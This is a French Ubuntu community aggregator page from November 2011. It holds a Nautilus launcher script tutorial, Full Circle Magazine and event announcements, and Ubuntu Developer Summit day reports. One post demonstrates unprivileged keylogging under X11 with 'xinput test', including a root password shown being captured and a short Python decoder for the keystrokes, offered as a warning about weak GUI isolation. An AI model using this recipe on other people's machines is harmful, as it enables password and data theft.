Planet

Je vous présentais il y a quelques jours la possibilité de créer lanceurs et raccourcis sur votre bureau à l’aide du terminal; je vous propose aujourd’hui un script permettant de réaliser la même opération à l’aide d’un simple clic droit sur le bureau.

C’est chez Ubuntu Up que j’ai découvert ce script que j’ai du modifier pour qu’il fonctionne sur le « Bureau » français plutôt que sur le « Desktop ».

Dans un premier temps, nous allons ouvrir un terminal afin de télécharger ce script et de le placer dans notre dossier « Scripts » à l’aide de la commande:

wget http://www.clapico.com/telechargement/Create-Launcher
cp Create-Launcher ~/.gnome2/nautilus-scripts
chmod +x ~/.gnome2/nautilus-scripts/Create-Launcher
mv ~/.gnome2/nautilus-scripts/Create-Launcher ~/.gnome2/nautilus-scripts/"Créer lanceur ou raccourci"

Vous pouvez dès maintenant faire un clic droit sur le dossier.

Naviguez jusqu’à « Scripts » puis « Créer un lanceur »

Amusez-vous bien

Billets reliés

04 Novembre 2011 à 15:34

Voici, enfin, le numéro 52 ! via Full Circle Mag FR

Bonjour à toutes et à tous !

L'équipe française du magazine Full Circle est heureuse de vous présenter le numéro 52 du FCMfr, d'août 2011. Vous pouvez le télécharger sur notre page Numéros, en cliquant sur l'image de la couverture (ci-dessous) ou, enfin, en cliquant sur « Télécharger les numéros » en haut à droite de cette page.

Issue52fr.png

Ce numéro, bien étoffé (55 pages), vous présente, outre les rubriques habituelles, une série de tutoriels :

  • La suite copieuse des articles sur la programmation en Python, partie 26, permettant d'approfondir les fenêtres, les boutons, les étiquettes, les cases à cocher, les boutons radio, les zones de texte, les listes avec une barre de défilement verticale et les fenêtres de message.
  • La partie 4 de l'article sur le développement Ubuntu.
  • Le début d'une série d'articles sur l'utilisation d'Ubuntu dans le monde des affaires ainsi que dans l'éducation.
  • La première partie de GRAMPS, logiciel de généalogie, présenté le mois dernier.
  • Un article sur un jeu, BEEP, mettant en scène des zombies, thème très couru des jeux vidéo.
  • Il y a également dans la partie Mon opinion, la façon d'utiliser un logiciel de traitement de texte Microsoft sous Ubuntu, afin de ne pas perdre les données, notamment d'alignement.


Un grand merci à tous les nouveaux venus dans notre équipe ! Cependant, il reste, bien entendu, beaucoup de travail pour nous tous, ainsi que de la place pour d'autres bonnes âmes ! Tiens, par exemple : y a-t-il quelqu'un qui aime bien faire les mises en page et voudrait tenter l'aventure d'être « scribeur » (avec Scribus) ??

En attendant de vous voir ou revoir sur le Wiki et le Forum, nous espérons que vous profiterez bien de ce numéro,

Toute l'équipe du FCMfr

04 Novembre 2011 à 14:10

Capitole du Libre à Toulouse via Ubuntu Party

Comme tous les ans à la même époque , les associations Toulibre et Ubuntu-fr s’unissent pour fếter les logiciels libres et la sortie de la nouvelle version 11.10 de la distribution GNU/Linux Ubuntu, nommée “Oneiric Ocelot”.

Cette année l’événement se déroule sur 2 jours, les 26 et 27 Novembre 2011, et va permettre la découverte des Logiciels Libres et l’aide à l’installation de GNU/Linux, le tout à base de conférences, démonstrations, ateliers et install-party. Les conférences seront animées par des personnalités de la communauté du Logiciel Libre.

Mais ce n’est pas la seule nouveauté : en effet cette année, DrupalCamp et Akademy-fr s’ajoutent à l’Ubuntu Party pour constituer un événement de plus grande ampleur: le Capitole du Libre

 

 

 

 

 

 

 

C’est quand déjà ?

L’événement a lieu le samedi 26 novembre 2011 de 13h à 21h, et le dimanche 27 novembre 2011 de 10h à 17h.

Où ?

ENSEEIHT – 2, Rue Charles Camichel
31000 TOULOUSE S’y rendre : Métro Jean-Jaurès (ligne A ou B) ou François Verdier (ligne B). Bus 27.

Le programme complet ?

Les informations pratiques et le programme détaillé sont disponibles sur le site capitole du Libre

Si vous souhaitez avoir un accès rapide à vos dossiers, vous pouvez désormais utiliser « Indicator-Places » de Shamil afin de créer un menu spécifique accessible depuis le tableau de bord Unity des versions 11.04 et 11.10 d’Ubuntu.

Cette fonctionnalité  n’étant disponible dans les dépôts officiels d’Ubuntu, vous ne devez l’installer qu’en toute connaissance de cause.

  • Téléchargez Indicator-Places ici pour la version que j’ai francisé ou sur cette page pour la version originale.
  • Décompressez le dossier shamil-indicator-places-5509fae.tar.gz
  • Double-cliquez sur le fichier indicator-places.py afin de faire apparaître le menu en question dans votre tableau de bord.
Pour que cet indicateur apparaisse à chaque démarrage d’Ubuntu, il ne reste plus qu’à l’ajouter dans la liste des applications au démarrage accessible depuis le bouton extinction/réglages situé à droite du tableau de bord. Cliquez sur « Ajouter » puis, une fois la fenêtre « Ajout d’un programme de démarrage » ouverte, indiquez à l’aide du bouton « Parcourir » le chemin d’accès au fichier indicator-places.py

Amusez-vous bien

Source : Up Ubuntu

 

Billets reliés

La question que Ronnie pose pour le FCM n° 55 est :

Avez-vous fait une mise à niveau de votre *buntu actuel vers la 11.04 ? Si oui, comment ? Si non, pourquoi pas ? Ou avez-vous fait une installation propre ?
Pour répondre, allez à : http://goo.gl/huUna

Vous y trouverez la question suivante : Avez-vous fait une mise à niveau ou une installation propre (« Did you update your current install or do a fresh install ?»), avec un menu déroulant qui vous propose les réponses suivantes : « Not upgrading » (pas de mise à niveau), « Upgraded from 10.04 » (Mise à niveau de la 10.04) ou de la 10.10 ou de la 11.04, ou « Updated from 11.10 (alpha/beta/RC) » (Mise à jour de la 11.10) et, enfin, « Fresh install for me ! » (Installation propre) .

Ensuite, il y a une question « ouverte » : Pourquoi avez-vous fait une Mise à niveau/mise à jour au lieu d'une installation propre ?
Et une deuxième question « ouverte » : Si vous avez fait une installation propre, pourquoi ne pas avoir fait une mise à niveau ?
Enfin, une troisième question « ouverte » : Si vous ne faites pas de mise à niveau, pourquoi pas ?

Comme toujours il faut être bref et, comme toujours, nous serions heureux de traduire votre réponse pour vous. Il suffit de nous l'envoyer (à webmaster@fullcirclemag.fr) en français et vous le recevrez par retour de courrier - ou presque - en anglais. Vous pourrez alors aller sur le site http://goo.gl/huUna pour remplir le questionnaire vous-même. (N.B. Si vous essayez de nous contacter en écrivant un commentaire, une réponse prendra nettement plus de temps.)

À bientôt peut-être ?!

Juste un mot pour vous parler brièvement de l’Ubuntu-Party qui a lieu du 11 (le 11-11-11,  :-) ) au 13 Novembre 2011 à la Cité des sciences à Paris, comme tous les 6 mois.

L’Ubuntu-Party est une super occasion de mieux se familiariser avec l’un des plus populaire des OS GNU/Linux. Envie de tester? Des installations d’Ubuntu y seront proposés (amenez donc votre PC perso) ainsi que des ateliers techniques en plus de cours et conférences.

Au programme (le programme peut-être à tout moment modifié. Plus d’infos ICI) :

Vendredi 11

Conférences

  • 11h11 – Introduction à Ubuntu par Frédéric Mandé
  • 12h00 – Ubuntu 11.10 : Les nouveautés par Didier Roche
  • 13h00 – Kubuntu : Osez un autre environnement par Aurélien Gâteau
  • 14h00 – Ubuntu Cloud et Juju, les outils d’infrastructure orientés services par Nicolas Barcet
  • 15h00 – Licences Libres : sécuriser et accompagner l’expansion du Libre dans le logiciel et au-delà par Benjamin Jean
  • 16h00 – Création d’un logiciel libre par fabrice Rey
  • 17h00 – Les batailles politiques et institutionnelles autour du logiciel libre par Jeanne Tadeusz

Ateliers et cours d’initiation

  • 11h30 – Découvrir la ligne de commande
  • 11h30 – Modélisation 3D avec Blender
  • 12h30 – Traduire un logiciel libre : la méthode KDE
  • 12h30 – Découvrir Ubuntu
  • 13h30 – Dompter Ubuntu et Unity
  • 14h30 – Découvrir Ubuntu
  • 14h30 – Personnalisation et environnement de bureau alternatif
  • 14h30 – Initiation à la récupération de données, où s’arrêter ?
  • 15h30 – Ubuntu Server et Cloud
  • 15h30 – Dompter Ubuntu et Unity
  • 16h30 – Intégrer son application à unity

Samedi 12

Conférences

  • 11h11 – Introduction à Ubuntu par Frédéric Mandé
  • 12h00 – Ubuntu 11.10 : Les nouveautés par Didier Roche
  • 13h00 – Accessibilité et logiciels libres : enjeux politiques et actualité par Armony ALTINIER
  • 14h00 – L’Abris-bus libre par Patrick Ablard
  • 14h30 – Framasoft : 10 ans de promotion du libre auprès du grand public par Pierre-Yves Gosset
  • 15h30 – Jouer sous Linux par Sébastien Bernery
  • 16h00 – Ventes forcées de logiciels : jurisprudence et politique par Cyprien Gay
  • 17h00 – Migrer vers Ubuntu en entreprise : Au théâtre de l’Odéon. par sylvain cardine
  • 17h30 – Agir pour l’internet libre par Félix Treguer

Ateliers et cours d’initiation

  • 11h30 – Découvrir la ligne de commande
  • 12h30 – C’est quoi un « traducthon »
  • 12h30 – Découvrir Ubuntu
  • 13h30 – Introduction au logiciel libre
  • 13h30 – Dompter Ubuntu et Unity
  • 14h30 – Découvrir Ubuntu
  • 14h30 – Personnalisation et environnement de bureau alternatif
  • 15h30 – Dompter Ubuntu et Unity
  • 15h30 – Introduction au JavaScript
  • 16h30 – comment mettre à jour un paquet dans ubuntu
  • 14h30 – Initiation à la récupération de données, où s’arrêter ?
  • 15h00 – Évaluer l’accessibilité d’un site Web quand on n’y connaît rien !

Dimanche 13

  • 11h11 – Introduction à Ubuntu par Frédéric Mandé
  • 12h00 – Ubuntu 11.10 : Les nouveautés par Didier Roche
  • 13h00 – GNOME 3, l’origine par Frédéric Péters
  • 14h00 – LibreOffice par Sophie Gautier
  • 14h45 – Parinux, participez à nos activités par Aurélien Couderc
  • 15h15 – Le libre en Entreprise par ANTONIn HILY
  • 16h00 – Vote électronique : en quoi le logiciel libre n’est pas la solution par Benoît Sibaud
  • 17h00 – Neutralité du net : définitions, enjeux par Benjamin Bayart

Ateliers et cours d’initiation

  • 11h30 – Découvrir la ligne de commande
  • 11h30 – S’initier à Wikimedia Commons, Médiathèque librement réutilisable
  • 12h30 – Découvrir Ubuntu
  • 12h30 – S’initier à Wikiversité
  • 13h30 – Introduction au logiciel libre
  • 13h30 – Dompter Ubuntu et Unity
  • 14h30 – Découvrir Ubuntu
  • 14h30 – Personnalisation et environnement de bureau alternatif
  • 15h30 – Dompter Ubuntu et Unity
  • 15h30 – Aller plus loin avec la ligne de commande
  • 16h30 – S’initier à wikipedia
  • 15h00 – Le Lego-Libre ou comment reconditionner une machine
  • 15h00 – OpenStreetMap : Partagez la connaissance de votre environnement

Information et contact ICI. La popularité d’Ubuntu et ce genre de salon ne peut faire du bien à l’image de GNU/Linux, vous ne pensez pas?

03 Novembre 2011 à 05:47

UDS Jour 3 via Gilir

Session d’aujourd’hui

Analyse des bugs sous forme de graphes (dashboard)

http://summit.ubuntu.com/uds-p/meeting/19483/other-p-bug-dashboard/

https://blueprints.launchpad.net/ubuntu/+spec/other-p-bug-dashboard

Cette session avait pour but de créer une façon d’étudier les bugs de plusieurs paquets de façon centralisée et graphique. Actuellement, quand des gens veulent travailler sur plusieurs paquets, ils créent une équipe, et souscrive tous les paquets qui les intéressent. Cela marche pour récupérer l’information, mais pas pour des statistiques (statuts, sévérités, en cours …).

 

Ask Ubuntu pour les experts.

http://summit.ubuntu.com/uds-p/meeting/19717/community-askubuntu-experts/

https://blueprints.launchpad.net/ubuntu/+spec/community-askubuntu-experts

Présentation de Askubuntu, et de quelques fonctionnalités avancées (édition, tag, votes, récompenses …) et la possible intégration avec les Loco teams. On déplorera quand même que Askubuntu soit seulement en anglais, pas très facile pour faire du support, par exemple avec des français.

 

Intégration du calendrier

http://summit.ubuntu.com/uds-p/meeting/19450/desktop-p-calendar-integration/

https://blueprints.launchpad.net/ubuntu/+spec/desktop-p-calendar-integration

Cette session avait pour but de discuter l’inclusion d’une solution de calendrier, parce que le changement pour Thunderbird par défaut a supprimé cette fonctionnalité.

Il y a plusieurs solutions :

- Ajouter un plugin à TB (lightning) pour ajouter cette fonctionnalité. Mais, les développeurs ne sont pas chaud pour ajouter une extension à TB par défaut.

- Adopter Maya, le calendrier d’Elementary OS. Mais c’est une application encore très incomplète, qui a besoin d’aide pour être terminée.

- Écrire une nouvelle application. Mais il faut du temps et des ressources, pour une solution qui sera à terme remplacée soit quand GNOME aura sa propre solution de calendrier (en cours), soit quand Maya fonctionnera correctement.

Les discussions ont suivies dans la session des applications par défaut, et a priori, rien ne sera fait pour combler ce manque sur la 12.04.

 

12.04 LTS (Precise Pangolin) Planning de sortie

http://summit.ubuntu.com/uds-p/meeting/19548/other-p-release-lts-planning/

https://blueprints.launchpad.net/ubuntu/+spec/other-p-release-lts-planning

Celle-ci était sur le planning de la future version. C’est une revue de la feuille de route, et des ajustements éventuels. Par exemple, le DebianImportFreeze (la date d’arrêt des imports de Debian testing vers Ubuntu).a été bougé après la période des fêtes de fin d’année. Également, il a été confirmé qu’il n’y aura plus d’images RC officielles. A la place, une période sera déclarée à partir de laquelle, toutes les images produites seront des “release candidate”.

Également, le statut des dérivés a été abordé. Enfin, quelque chose a été écrit sur ce statut, comment peut-on y arriver, ce que Canonical offre pour soutenir ces dérivés … C’était quelque chose de très flou, et nous avons souffert de cela quand nous avons essayé de rendre Lubuntu officiel.

Voir les détails :

https://wiki.ubuntu.com/RecognizedDerivatives

 

Les plénières ont été sur la technologie ARM, et sur les brevets logiciels. Nous avons également eu la traditionnelle photo de groupe.

 

Version de GNOME

https://blueprints.launchpad.net/ubuntu/+spec/desktop-p-gnome-version

http://summit.ubuntu.com/uds-p/meeting/19454/desktop-p-gnome-version/

Cette session avait pour but de définir la version de GNOME qui sera utilisée, soit la 3.2 (la version stable actuelle), soit la 3.4 (la future version).

Pour les 2 pièces principales (GTK et glib), il a été décidé de les mettre à jour vers la version la plus à jour. Il faudra cependant que des vérifications soit faites, car GTK a implémenté une fonctionnalité de multi-touches, qu’Ubuntu a déjà. Il faudra s’assurer qu’il n’y a pas de conflit. Également, le sujet d’une version de GTK style LTS (version supportée pendant 2 ans) a été abordée, mais devra être débattu avec les développeurs de GNOME.

Pour le reste des applications, par défaut elle resterons en 3.2. Au cas par cas, elles pourront être mise à jour. Mais pour certaine, il est déjà prévu de les garder sur la 3.2 (Nautilus, gvfs, Evolution, Empathy).

 

Discussion sur les applications par défaut

https://blueprints.launchpad.net/ubuntu/+spec/desktop-p-default-apps

http://summit.ubuntu.com/uds-p/meeting/19442/desktop-p-default-apps/

La discussion habituelle sur les applications par défaut. Beaucoup de sujets ont été abordés, entre autres :

- Inclusion de Boot-repair sur le live-cd, sauf gros problème technique

- Inclusion de FreeRDP, va être étudiée (quelques vérifications de sécurité à faire)

- Pas d’éditeur de vidéos, le besoin ne s’en fait pas sentir

- Rhythmbox / Banshee :

Ce fut une surprise pour moi de voir ce sujet revenir sur le tapis. Et ce fut assez animé entre les pro RB et les pro Banshee. Les 2 solutions ont leur inconvénients :

- Banshee : Problèmes sur ARM, pas de port sur GTK3, et sa suppression enlèverai Mono du CD (gain de place) et probablement de main (pas de support de sécurité à faire pendant les 5 ans de la LTS).

- RB : Le magasin U1 devra être mis à jour, ainsi que le lens Musique. Il faudra également que le projet amont sorte une version officielle (une copie de l’arbre de développement est actuellement intégré à Ubuntu).

Un sondage rapide dans la salle a montré que l’utilisation entre les 2 étaient d’environ 50 / 50 (peut-être un tout petit peu plus pour RB).

En conclusion, RB risque bien de revenir sur le CD à la place de Banshee, si aucun problème n’est soulevé pas d’autres équipes non présentes à la session. Ce fut une décision difficilement prise pendant la session. C’est une décision que je comprends, au regard de la maintenance à faire sur 5 ans. Et puis, Banshee sera toujours disponible dans les dépôts, avec le même niveau d’intégration que dans la 11.10.


Tagged: Lubuntu, Packages, planet-libre, planet-ubuntu-fr, Ubuntu
02 Novembre 2011 à 14:27

UDS Jour 2 via Gilir

Sessions d’aujourd’hui :

Réduire les temps de création des ISO

http://summit.ubuntu.com/uds-p/meeting/19533/foundations-p-image-build-pipeline/

https://blueprints.launchpad.net/ubuntu/+spec/foundations-p-image-build-pipeline

Cette session avait pour but de réduire les temps de création des images. C’est important durant les périodes de tests, quand on a besoin de reconstruire beaucoup d’images. Par exemple, si l’installeur est cassé, et qu’il est réparé pendant la période de test des ISO, beaucoup d’ISO devront être reconstruite. En réduisant ce temps, on accélère les tests et on prends moins de risque de prendre du retard sur une sortie.

Identifier les ISO “daily” cassé

http://summit.ubuntu.com/uds-p/meeting/19409/other-p-builds-smoke-testing/

https://blueprints.launchpad.net/ubuntu/+spec/other-p-builds-smoke-testing

Cette session était sur les tests automatiques et comment générer un rapport automatique, pour être sûr que les ISO «daily» sont en bon état pour être testés (démarrage et installation OK) C’est utile pour que les gens qui testent ne perdent pas de temps à télécharger une version cassée (et pas testable). Cela sera disponible pour Ubuntu et Ubuntu Server, mais comme des parties importantes sont communes (exemple, l’installeur), cela bénéficiera aussi aux dérivées.

Expérience utilisateur sur Lubuntu

http://summit.ubuntu.com/uds-p/meeting/19473/other-lubuntu-p-users-experience/

https://blueprints.launchpad.net/ubuntu/+spec/other-lubuntu-p-users-experience

1e session pour Lubuntu, ce fut l’occasion de discuter les nouvelles fonctionnalités, et les nouvelles applications par défaut. Il n’y avait pas beaucoup de personnes dans la salle, mais certaines ont eu la possibilité de participer par IRC. J’ai présenté ce que je comptais faire au prochain cycle :

- Lightdm par défaut pour l’Alpha1

- Possibilité de configurer le multi-écran en utilisant un outil externe comme arandr

- Options / services dans Lxsession : ajouter la possibilité de configurer les applications par défaut, et de les activer ou non (exemple, l’économiseur d’écran ou le gestionnaire d’énergie).

- Lubuntu-software-center par défaut, mais en gardant synaptic.

FreeRDP

http://summit.ubuntu.com/uds-p/meeting/19614/desktop-p-freerdp/

https://blueprints.launchpad.net/ubuntu/+spec/desktop-p-freerdp

Présentation de FreeRDP and Remmina. Il y a une autre session cette semaine pour discuter si l’on remplace la solution actuelle de bureau distant (vinaigre, tsclient …) par celle-ci. Upstream est très actif, et ils ont commencé à travailler sur l’intégration dans Ubuntu (migration à GTK3, support des indicateurs).

Les pléniaires étaient sur openstack et Rackspace, le développement d’applications sous Ubuntu, et l’écosystème de Qt (comment cela est organisé, les réussites et ce qui est prévu pour Qt 5.0).

Piloter un nouvel outil de gestion des tests

https://blueprints.launchpad.net/ubuntu/+spec/other-p-qa-test-case-management-tool

http://summit.ubuntu.com/uds-p/meeting/19416/other-p-qa-test-case-management-tool/

Cette session avait pour but de récolter les besoins des utilisateurs, dans le but de déployer un outil de gestion des tests, en remplacement des pages de wiki existantes. Pas de décision pour l’instant sur le choix de l’outil.

Optimisations dans Lubuntu

http://summit.ubuntu.com/uds-p/meeting/19472/other-lubuntu-p-optimizations/

https://blueprints.launchpad.net/ubuntu/+spec/other-lubuntu-p-optimizations

La seonde session de Lubuntu ne fut pas très utile, la plupart des sujets ayant été débattus à la première session. La discussion continuera sur la mailing list. Un élément supplémentaire, est que nous resterons sur GTK2 pour nos principales applications, car ni le panel, ni le gestionnaire de fichiers, ni le navigateur ne prévoit de migrer pendant ce cycle.

Améliorer la réunion hebdomadaire de la «release team»

https://blueprints.launchpad.net/ubuntu/+spec/other-p-release-meeting

http://summit.ubuntu.com/uds-p/meeting/19547/other-p-release-meeting/

La dernière session avait pour but d’améliorer la réunion hebdomadaire des différentes teams, afin de faire un point sur le développement avec la release team. De bonne dées ont été proposées, et seront appliquées aux prochaines (comme l’envoi des compte-rendus d’équipe la veille de la réunion). Cela devrait réduire la durée de cette réunion. Également, nous avons eu une présentation de quelques outils utilisés par la release team (comme statut.ubuntu.com)

C’est tout pour ajourd’hui.


Tagged: Lubuntu, Packages, planet-libre, planet-ubuntu-fr, Ubuntu


En tant que root, il est bien sûr potentiellement possible de faire ce que l’on veut sur sa machine, comme enregistrer toutes les touches tapées au clavier (keylogger).

Mais aussi incroyable (et inquiétant) que cela puisse paraître, il est possible de faire exactement la même chose… sans être root.

Démonstration

Et en plus, c’est tout simple : il suffit pour un programme d’écouter les événements clavier envoyés par le serveur X.
Prenons un outil qui le fait déjà (ça nous évitera de le coder), xinput :

apt-get install xinput

Pour obtenir la liste des périphériques utilisables :

xinput list

Repérer la ligne concernant le clavier (contenant « AT ») et noter son id (ici 11).

$ xinput list | grep AT ↳ AT Translated Set 2 keyboard id=11 [slave keyboard (3)]

Puis démarrer l’écoute sur ce périphérique dans un terminal :

xinput test 11

Au fur et à mesure que l’on tape du texte, la sortie standard de xinput indique quelles touches sont tapées :

key press 56 key release 56 key press 32 key release 32 key press 57 key release 57 key press 44 key release 44 key press 32 key press 30 key release 32 key release 30 key press 27 key release 27

Cela fonctionne même lorsqu’on écrit dans une autre application, quelque soit l’utilisateur qui l’a démarrée. En particulier, si dans un autre terminal on exécute la commande suivante, le mot de passe est bien capturé :

$ su - Mot de passe :

Un programme avec de simples droits utilisateur peut donc écouter tout ce qui est tapé au clavier (et donc l’enregistrer, l’envoyer à un serveur…).

Décodage

Convertisseur

La sortie de xinput n’est pas très utilisable en pratique. Pour la décoder, un programme d’une vingtaine de lignes en Python suffit (fortement inspiré de ce PoC). Appelons-le xinput-decoder.py :

#!/usr/bin/env python # -*- coding: UTF-8 -*- import re, sys from subprocess import * def get_keymap(): keymap = {} table = Popen(['xmodmap', '-pke'], stdout=PIPE).stdout for line in table: m = re.match('keycode +(\d+) = (.+)', line.decode()) if m and m.groups()[1]: keymap[m.groups()[0]] = m.groups()[1].split()[0] return keymap if __name__ == '__main__': keymap = get_keymap(); for line in sys.stdin: m = re.match('key press +(\d+)', line.decode()) if m: keycode = m.groups()[0] if keycode in keymap: print keymap[keycode], else: print '?' + keycode,

Pour convertir le résultat à la volée :

xinput test 11 | ./xinput-decoder.py

Problème de redirection

Le problème, c’est que lorsqu’on redirige la sortie de xinput dans un fichier ou en entrée d’un autre programme, le contenu ne s’affiche que par salves (d’environ 128 caractères apparemment). Sans doute une histoire de buffer, à mon avis activé uniquement lorsque la fonction isatty() retourne true.

Pour contourner le problème et récupérer les dernières touches tapées, il est possible de démarrer la commande dans un screen :

screen xinput test 11

puis, à la fin de la capture, d’enregistrer le contenu dans un fichier. Pour cela, dans le screen ainsi ouvert, taper Ctrl+A, :, puis hardcopy -h /tmp/log.
De cette manière, /tmp/log contiendra toute la capture.

Pour convertir le résultat :

$ ./xinput-parser.py < /tmp/log s u space minus Return mon mot de passe root Return a p t minus g e t space u p d a t e Return Control_L a colon

Améliorations

Une solution plus pratique serait peut-être de démarrer xinput par le programme Python, en lui faisant croire qu’il écrit dans un TTY (ce que je ne sais pas faire). Quelqu’un l’a fait en Perl.

Liens

Merci à Papillon-butineur de m’avoir fait découvrir ce fonctionnement étonnant du serveur X.
Je vous recommande le billet suivant (en anglais) ainsi que ses commentaires : The Linux Security Circus: On GUI isolation.

01 Novembre 2011 à 04:41

UDS Jour 1 via Gilir

1e jour de l’UDS, et comme d’habitude il commence par une introduction de Jono Bacon, pour expliquer ce qu’est l’UDS, comment cela fonctionne, quelques conseils, et comment utiliser l’agenda et les blueprints. Ensuite, c’est la Keynote de Mark Shuttleworth. Cette fois, il a beaucoup insisté sur les réussites du dernier cycle (developer.ubuntu.com, Software-Center, Lightdm …); Pas d’annonce fracassant pour la prochaine sortie (il fallait s’en douter, la 12.04 étant une LTS, l’accent va être mis sur la stabilisation). L’annonce principale portait sur la version LTS suivante (14.04) : Ubuntu sur tout (tablettes, TVs, téléphones …). Le but annoncé est de pourvoir installé Ubuntu sur n’importe quel appareil. Enfin pour finir, le président de Linaro a fait une présentation du projet avec qui nous partageons le centre de conférence.

 

Sessions du jour

Comme d’habitude, l’agenda a été très instable, notamment pour les sessions que je voulais suivre :) Heureusement, certaines sont restées en place :)

 

Construction d’images

http://summit.ubuntu.com/uds-p/meeting/19546/ubuntu-arm-p-image-build-tools/

https://blueprints.launchpad.net/ubuntu/+spec/ubuntu-arm-p-image-build-tools

Cette session était sur comment construire une image ISO sans l’infrastructure Ubuntu habituelle. Des progrès ont été faits, par l’utilisation de live-build et ubuntu-defaults-builder. Ils sont utilisés pour créer des ISO localisées (comme la chinoise et la française). Mais il manque encore quelques fonctionnalités à ce système, et il ne résout pas les problèmes de création des images ARM (qui utilisent des images spécifiques pour chaque matériel)

 

Feuille de route de la logithèque

https://blueprints.launchpad.net/ubuntu/+spec/consumer-p-software-center-enhancements

http://summit.ubuntu.com/uds-p/meeting/19743/consumer-p-software-center-enhancements

Ce fut une session généraliste sur les futures évolutions de la logithèque :

* Performance : les développeurs sont au courant des problèmes de performances, et vont travailler dessus pour la prochaine version.

* Test unitaires : Comment améliorer la couverture des tests unitaires (qui est actuellement bonne, mais pas assez).

* Revue de code et documentation. : les développeurs vont essayer d’améliorer la documentation pour les nouveaux contributeurs.

* Amélioration de l’intégration avec Unity (lens)

* Recommandations : Ajout automatiquement des recommandations de paquets basées sur ceux déjà installés sur le système.

A mon avis, c’est un bon compromis entre fonctionnalités et augmentation de la qualité pour une LTS.

Après le déjeuner, il y a des séances plénières sur des sujets diverses. Aujourd’hui, c’était sur Cloud Foundry, et, plus intéressant pour moi, sur la relation entre Debian et Ubuntu, fait par le leader Debian. La situation semble s’être améliorée depuis 2 ans, et je suis assez d’accord, les développeurs Debian semblent plus réceptifs aux contributions venant d’Ubuntu. Je pense que les conflits restant sont surtout des personnes qui ont des points de vue différents, des cas qu’on ne peut régler au niveau du projet, mais seulement au cas par cas.

Amélioration du process de sortie

https://blueprints.launchpad.net/ubuntu/+spec/other-p-release-process-improvements

http://summit.ubuntu.com/uds-p/meeting/19545/other-p-release-process-improvements/

Celle-ci était sur comment améliorer le process de sortie. L’un des sujets les plus discuté fut la non présence d’une image RC (release candidate). Pour oneiric, il n’y a pas eu d’images officiels, juste un moment ou les images ont été déclarées “release candidate”. Cela devrait être amélioré dans le futur (plus de communication sur ce sujet). Également, il y aura des améliorations sur le tracker des ISO (le site regroupant les tests des ISO), quand un “respin” [1] est nécessaire.

Nettoyage du centre de contrôle

https://blueprints.launchpad.net/ubuntu/+spec/desktop-p-control-center-cleanup

http://summit.ubuntu.com/uds-p/meeting/19451/desktop-p-control-center-cleanup/

Cette session était sur l’amélioration des applications Ubuntu dans le centre de contrôle de Gnome, comme les préférences d’Ubuntu One, les configurations de la langue (language-selector), le support de drivers supplémentaire (jockey) …Le but est d’avoir ces programmes à l’intérieur  de la fenêtre principale, à la place d’un programme part.

Support des liens paquets <=> équipe efficace

http://summit.ubuntu.com/uds-p/meeting/19664/other-p-package-mapping/

https://blueprints.launchpad.net/launchpad/+spec/other-p-package-mapping

La dernière session était sur la possibilité d’implémenter une fonctionnalité sur Launchpad pour lier les paquets à une équipe responsable de résoudre les bugs de ce paquet, pour avoir un point de contact unique. C’est particulièrement utile pour la release team, pour affecter le bug et savoir a qui s’adresser pour corriger le bug. une solution proposée a été d’utiliser les packagesets (groupe de paquets référencé sur Launchpad).

C’est tout pour aujourd’hui. Demain, il y aura les 2 sessions Lubuntu plannifiées pour l’UDS. il est temps que je les prépare :)

[1]Actuellement, le test organisé des ISO se fait quelques jours avant la sortie des versions intermédiares (Alpha, Beta …). Pour valider une ISO (pour dire Ok, on peut sortir cette ISO), il faut faire plusieurs tests manuels (comme tester l’installation). Quand un bug est corrigé sur des paquets spécifiques (comme l’installeur ubiquity), on a besoin de reconstruire l’image pour inclure la correction. Après ça, il faut refaire tous les tests de validation de l’ISO. Par exemple, s’il y a 3 respin, les tests que vous avez pu faire sur les 2 premières ne servent à rien et devront être refaits sur la 3e images.


Tagged: Lubuntu, Packages, planet-libre, planet-ubuntu-fr, Ubuntu

Pages